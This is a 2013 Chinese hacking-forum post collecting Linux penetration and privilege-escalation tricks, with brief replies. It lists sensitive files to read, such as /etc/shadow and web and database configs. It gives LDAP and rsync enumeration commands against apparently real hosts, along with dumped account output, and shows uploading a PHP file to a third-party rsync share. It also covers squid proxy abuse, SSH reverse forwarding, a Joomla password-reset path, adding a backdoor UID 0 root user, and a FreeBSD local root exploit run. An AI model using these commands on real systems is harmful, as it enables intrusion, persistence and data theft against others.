搜索
查看: 487|回复: 3

Linux渗透与提权:技巧总结篇

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-12-29 21:15:02 | 显示全部楼层 |阅读模式
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径:
  1. /etc/passwd

  2. /etc/shadow

  3. /etc/fstab

  4. /etc/host.conf

  5. /etc/motd

  6. /etc/ld.so.conf

  7. /var/www/htdocs/index.php

  8. /var/www/conf/httpd.conf

  9. /var/www/htdocs/index.html

  10. /var/httpd/conf/php.ini

  11. /var/httpd/htdocs/index.php

  12. /var/httpd/conf/httpd.conf

  13. /var/httpd/htdocs/index.html

  14. /var/httpd/conf/php.ini

  15. /var/www/index.html

  16. /var/www/index.php

  17. /opt/www/conf/httpd.conf

  18. /opt/www/htdocs/index.php

  19. /opt/www/htdocs/index.html

  20. /usr/local/apache/htdocs/index.html

  21. /usr/local/apache/htdocs/index.php

  22. /usr/local/apache2/htdocs/index.html

  23. /usr/local/apache2/htdocs/index.php

  24. /usr/local/httpd2.2/htdocs/index.php

  25. /usr/local/httpd2.2/htdocs/index.html

  26. /tmp/apache/htdocs/index.html

  27. /tmp/apache/htdocs/index.php

  28. /etc/httpd/htdocs/index.php

  29. /etc/httpd/conf/httpd.conf

  30. /etc/httpd/htdocs/index.html

  31. /www/php/php.ini

  32. /www/php4/php.ini

  33. /www/php5/php.ini

  34. /www/conf/httpd.conf

  35. /www/htdocs/index.php

  36. /www/htdocs/index.html

  37. /usr/local/httpd/conf/httpd.conf

  38. /apache/apache/conf/httpd.conf

  39. /apache/apache2/conf/httpd.conf

  40. /etc/apache/apache.conf

  41. /etc/apache2/apache.conf

  42. /etc/apache/httpd.conf

  43. /etc/apache2/httpd.conf

  44. /etc/apache2/vhosts.d/00_default_vhost.conf

  45. /etc/apache2/sites-available/default

  46. /etc/phpmyadmin/config.inc.php

  47. /etc/mysql/my.cnf

  48. /etc/httpd/conf.d/php.conf

  49. /etc/httpd/conf.d/httpd.conf

  50. /etc/httpd/logs/error_log

  51. /etc/httpd/logs/error.log

  52. /etc/httpd/logs/access_log

  53. /etc/httpd/logs/access.log

  54. /home/apache/conf/httpd.conf

  55. /home/apache2/conf/httpd.conf

  56. /var/log/apache/error_log

  57. /var/log/apache/error.log

  58. /var/log/apache/access_log

  59. /var/log/apache/access.log

  60. /var/log/apache2/error_log

  61. /var/log/apache2/error.log

  62. /var/log/apache2/access_log

  63. /var/log/apache2/access.log

  64. /var/www/logs/error_log

  65. /var/www/logs/error.log

  66. /var/www/logs/access_log

  67. /var/www/logs/access.log

  68. /usr/local/apache/logs/error_log

  69. /usr/local/apache/logs/error.log

  70. /usr/local/apache/logs/access_log

  71. /usr/local/apache/logs/access.log

  72. /var/log/error_log

  73. /var/log/error.log

  74. /var/log/access_log

  75. /var/log/access.log

  76. /usr/local/apache/logs/access_logaccess_log.old

  77. /usr/local/apache/logs/error_logerror_log.old

  78. /etc/php.ini

  79. /bin/php.ini

  80. /etc/init.d/httpd

  81. /etc/init.d/mysql

  82. /etc/httpd/php.ini

  83. /usr/lib/php.ini

  84. /usr/lib/php/php.ini

  85. /usr/local/etc/php.ini

  86. /usr/local/lib/php.ini

  87. /usr/local/php/lib/php.ini

  88. /usr/local/php4/lib/php.ini

  89. /usr/local/php4/php.ini

  90. /usr/local/php4/lib/php.ini

  91. /usr/local/php5/lib/php.ini

  92. /usr/local/php5/etc/php.ini

  93. /usr/local/php5/php5.ini

  94. /usr/local/apache/conf/php.ini

  95. /usr/local/apache/conf/httpd.conf

  96. /usr/local/apache2/conf/httpd.conf

  97. /usr/local/apache2/conf/php.ini

  98. /etc/php4.4/fcgi/php.ini

  99. /etc/php4/apache/php.ini

  100. /etc/php4/apache2/php.ini

  101. /etc/php5/apache/php.ini

  102. /etc/php5/apache2/php.ini

  103. /etc/php/php.ini

  104. /etc/php/php4/php.ini

  105. /etc/php/apache/php.ini

  106. /etc/php/apache2/php.ini

  107. /web/conf/php.ini

  108. /usr/local/Zend/etc/php.ini

  109. /opt/xampp/etc/php.ini

  110. /var/local/www/conf/php.ini

  111. /var/local/www/conf/httpd.conf

  112. /etc/php/cgi/php.ini

  113. /etc/php4/cgi/php.ini

  114. /etc/php5/cgi/php.ini

  115. /php5/php.ini

  116. /php4/php.ini

  117. /php/php.ini

  118. /PHP/php.ini

  119. /apache/php/php.ini

  120. /xampp/apache/bin/php.ini

  121. /xampp/apache/conf/httpd.conf

  122. /NetServer/bin/stable/apache/php.ini

  123. /home2/bin/stable/apache/php.ini

  124. /home/bin/stable/apache/php.ini

  125. /var/log/mysql/mysql-bin.log

  126. /var/log/mysql.log

  127. /var/log/mysqlderror.log

  128. /var/log/mysql/mysql.log

  129. /var/log/mysql/mysql-slow.log

  130. /var/mysql.log

  131. /var/lib/mysql/my.cnf

  132. /usr/local/mysql/my.cnf

  133. /usr/local/mysql/bin/mysql

  134. /etc/mysql/my.cnf

  135. /etc/my.cnf

  136. /usr/local/cpanel/logs

  137. /usr/local/cpanel/logs/stats_log

  138. /usr/local/cpanel/logs/access_log

  139. /usr/local/cpanel/logs/error_log

  140. /usr/local/cpanel/logs/license_log

  141. /usr/local/cpanel/logs/login_log

  142. /usr/local/cpanel/logs/stats_log

  143. /usr/local/share/examples/php4/php.ini

  144. /usr/local/share/examples/php/php.ini

  145. /usr/local/tomcat5527/bin/version.sh

  146. /usr/share/tomcat6/bin/startup.sh

  147. /usr/tomcat6/bin/startup.sh
复制代码

liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

  ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式
  ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录
  ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式
  2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式
  ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录
  ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性
  1. ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"

  2. version: 1

  3. dn: dc=ruc,dc=edu,dc=cn

  4. dc: ruc

  5. objectClass: domain

  6. dn: uid=manager,dc=ruc,dc=edu,dc=cn

  7. uid: manager

  8. objectClass: inetOrgPerson

  9. objectClass: organizationalPerson

  10. objectClass: person

  11. objectClass: top

  12. sn: manager

  13. cn: manager

  14. dn: uid=superadmin,dc=ruc,dc=edu,dc=cn

  15. uid: superadmin

  16. objectClass: inetOrgPerson

  17. objectClass: organizationalPerson

  18. objectClass: person

  19. objectClass: top

  20. sn: superadmin

  21. cn: superadmin

  22. dn: uid=admin,dc=ruc,dc=edu,dc=cn

  23. uid: admin

  24. objectClass: inetOrgPerson

  25. objectClass: organizationalPerson

  26. objectClass: person

  27. objectClass: top

  28. sn: admin

  29. cn: admin

  30. dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn

  31. uid: dcp_anonymous

  32. objectClass: top

  33. objectClass: person

  34. objectClass: organizationalPerson

  35. objectClass: inetOrgPerson

  36. sn: dcp_anonymous

  37. cn: dcp_anonymous
复制代码

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找
  1. bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"

  2. version: 1

  3. dn:

  4. objectClass: top

  5. namingContexts: dc=ruc,dc=edu,dc=cn

  6. supportedExtension: 2.16.840.1.113730.3.5.7

  7. supportedExtension: 2.16.840.1.113730.3.5.8

  8. supportedExtension: 1.3.6.1.4.1.4203.1.11.1

  9. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25

  10. supportedExtension: 2.16.840.1.113730.3.5.3

  11. supportedExtension: 2.16.840.1.113730.3.5.5

  12. supportedExtension: 2.16.840.1.113730.3.5.6

  13. supportedExtension: 2.16.840.1.113730.3.5.4

  14. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1

  15. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2

  16. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3

  17. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4

  18. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5

  19. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6

  20. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7

  21. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8

  22. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9

  23. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23

  24. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11

  25. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12

  26. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13

  27. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14

  28. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15

  29. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16

  30. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17

  31. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18

  32. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19

  33. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21

  34. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22

  35. supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24

  36. supportedExtension: 1.3.6.1.4.1.1466.20037

  37. supportedExtension: 1.3.6.1.4.1.4203.1.11.3

  38. supportedControl: 2.16.840.1.113730.3.4.2

  39. supportedControl: 2.16.840.1.113730.3.4.3

  40. supportedControl: 2.16.840.1.113730.3.4.4

  41. supportedControl: 2.16.840.1.113730.3.4.5

  42. supportedControl: 1.2.840.113556.1.4.473

  43. supportedControl: 2.16.840.1.113730.3.4.9

  44. supportedControl: 2.16.840.1.113730.3.4.16

  45. supportedControl: 2.16.840.1.113730.3.4.15

  46. supportedControl: 2.16.840.1.113730.3.4.17

  47. supportedControl: 2.16.840.1.113730.3.4.19

  48. supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2

  49. supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6

  50. supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8

  51. supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

  52. supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

  53. supportedControl: 2.16.840.1.113730.3.4.14

  54. supportedControl: 1.3.6.1.4.1.1466.29539.12

  55. supportedControl: 2.16.840.1.113730.3.4.12

  56. supportedControl: 2.16.840.1.113730.3.4.18

  57. supportedControl: 2.16.840.1.113730.3.4.13

  58. supportedSASLMechanisms: EXTERNAL

  59. supportedSASLMechanisms: DIGEST-MD5

  60. supportedLDAPVersion: 2

  61. supportedLDAPVersion: 3

  62. vendorName: Sun Microsystems, Inc.

  63. vendorVersion: Sun-Java(tm)-System-Directory/6.2

  64. dataversion: 020090516011411

  65. netscapemdsuffix: cn=ldap://dc=webA:389

  66. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA

  67. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA

  68. supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA

  69. supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA

  70. supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA

  71. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA

  72. supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA

  73. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

  74. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA

  75. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA

  76. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

  77. supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA

  78. supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA

  79. supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA

  80. supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA

  81. supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA

  82. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA

  83. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

  84. supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5

  85. supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA

  86. supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA

  87. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA

  88. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

  89. supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

  90. supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

  91. supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA

  92. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA

  93. supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA

  94. supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA

  95. supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA

  96. supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA

  97. supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA

  98. supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA

  99. supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA

  100. supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA

  101. supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5

  102. supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

  103. supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA

  104. supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA

  105. supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA

  106. supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA

  107. supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA

  108. supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5

  109. supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5

  110. supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5

  111. supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5

  112. supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5

  113. supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5

  114. supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
复制代码

liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

列举IP:

showmount -e ip

liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

1.查看rsync服务器上的列表:
  1. rsync 210.51.X.X::

  2. finance

  3. img_finance

  4. auto

  5. img_auto

  6. html_cms

  7. img_cms

  8. ent_cms

  9. ent_img

  10. ceshi

  11. res_img

  12. res_img_c2

  13. chip

  14. chip_c2

  15. ent_icms

  16. games

  17. gamesimg

  18. media

  19. mediaimg

  20. fashion

  21. res-fashion

  22. res-fo

  23. taobao-home

  24. res-taobao-home

  25. house

  26. res-house

  27. res-home

  28. res-edu

  29. res-ent

  30. res-labs

  31. res-news

  32. res-phtv

  33. res-media

  34. home

  35. edu

  36. news

  37. res-book
复制代码

看相应的下级目录(注意一定要在目录后面添加上/)
  1. rsync 210.51.X.X::htdocs_app/

  2. rsync 210.51.X.X::auto/

  3. rsync 210.51.X.X::edu/
复制代码

2.下载rsync服务器上的配置文件
  rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

  http://app.finance.xxx.com/warn/nothack.txt

liunx 相关提权渗透技巧总结,四、squid渗透技巧:

  nc -vv 91ri.org 80
GET HTTP://www.sina.com / HTTP/1.0
  GET HTTP://WWW.sina.com:22 / HTTP/1.0

liunx 相关提权渗透技巧总结,五、SSH端口转发:

  ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

确定版本:

  index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码:
index.php?option=com_user&view=reset&layout=confirm

liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:
  useradd -o -u 0 nothack

liunx 相关提权渗透技巧总结,八、freebsd本地提权:

  1. [argp@julius ~]$ uname -rsi

  2. * freebsd 7.3-RELEASE GENERIC

  3. * [argp@julius ~]$ sysctl vfs.usermount

  4. * vfs.usermount: 1

  5. * [argp@julius ~]$ id

  6. * uid=1001(argp) gid=1001(argp) groups=1001(argp)

  7. * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

  8. * [argp@julius ~]$ ./nfs_mount_ex

  9. *

  10. calling nmount()
复制代码

tar 文件夹打包:

1、tar打包:

  tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*

alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

{

注:

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

  tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

}
您可以更新记录, 让好友们知道您在做什么...
专业回帖 该用户已被删除
发表于 2013-12-29 21:21:21 | 显示全部楼层
谢谢楼主,共同发展
专业回帖 该用户已被删除
发表于 2013-12-29 21:26:25 | 显示全部楼层
这是什么东东啊
b0dboy 该用户已被删除
发表于 2013-12-31 09:47:47 | 显示全部楼层
不错,骚年。顶一个
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表